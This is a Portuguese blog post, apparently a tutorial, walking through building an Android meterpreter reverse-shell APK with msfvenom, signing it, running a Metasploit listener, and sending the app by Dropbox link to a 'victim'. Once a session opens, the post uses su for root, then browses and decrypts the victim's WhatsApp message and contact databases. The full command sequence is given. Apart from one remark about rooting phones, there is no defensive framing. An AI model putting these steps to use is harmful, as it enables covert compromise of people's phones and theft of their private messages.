O Metasploit é uma ferramenta usada para investigar vulnerabilidades em plataformas, servidores e em sistemas operacionais, com ele é possível realizar testes de invasão (pentests) criando um ambiente de exploração de vulnerabilidades. Quando uma vulnerabilidade é descoberta pode-se desenvolver um exploit, aplicando técnicas de engenharia reversa ou programação. O exploit é executado e testado em vários cenários, provando a existência de vulnerabilidades.
Criando Payloads Metasploit
Eu diria que um dos recursos mais úteis do Metasploit é o módulo msfpayload. Várias cargas (payloads) úteis podem ser criadas com este módulo, que também nos permite um shell em quase todas as situações. Para cada um desses payloads, você pode entrar no msfconsole e selecionar exploit/multi/handler. Executei ‘set payload‘ para configurar as opções necessárias (LHOST, LPORT, etc.). Executei e esperei que a carga útil fosse executada. Para o exemplo abaixo, que é bastante autoexplicativo, LHOST deve ser preenchido com seu endereço IP (LAN IP se atacar dentro da rede, WAN IP se atacar através da internet) e LPORT deve ser a porta na qual você deseja estar conectado.
Listando payloads
msfvenom -l

Neste post usei o android/meterpreter/reverse_tcp:
ifconfig
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.25.20 R> /root/wam.apk
d2j-apk-sign /root/wam.apk
msfconsole
shell
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.25.20
exploit


Fiz upload do aplicativo (wam-signed.apk) para o Dropbox.
Em seguida, enviei o link para a vítima. Deixei a vítima instalar e uma sessão foi iniciada.

help meterpreter

Navegando no Dispositivo:
shell

ACESSO ROOT
su

Navegando nas Medias do Whatsapp

Naveguei no banco de dados do Whatsapp

Nos aparelhos Android os arquivos de mensagens do Whatsapp estão localizados na memória do aparelho ou no cartão de memória. Na memória do aparelho o arquivo de mensagens, msg.db e o arquivo contendo a lista de contatos, wa.db, ficam na pasta /data/data/com.whataapp/databases, e o acesso a eles só é possível se o aparelho estiver no modo root, isto é um motivo para não “rootear” o seu android. No caso em que o aparelho esteja configurado para armazenar mensagens no cartão de memória, os mesmos serão criptografados na pasta /sdcard/WhatsApp/Databases com o nome msgstore-yyyy-mm-dd.X.db.crypt, ou seja, criptografado; existem vários algoritmos usados na criptografia, como crypt, crypt5, crypt6, crypt7, crypt8, crypt12… Para decriptografar este banco de dados, no sistema operacional Windows, é só fazer download do “whatsapp-viewer” no github, pelo link https://github.com/andreas-mausch/whatsapp-viewer/releases/tag/v1.9 Abrir o aplicativo e no menu Arquivo e escolher o método de criptografia.

Postar um comentário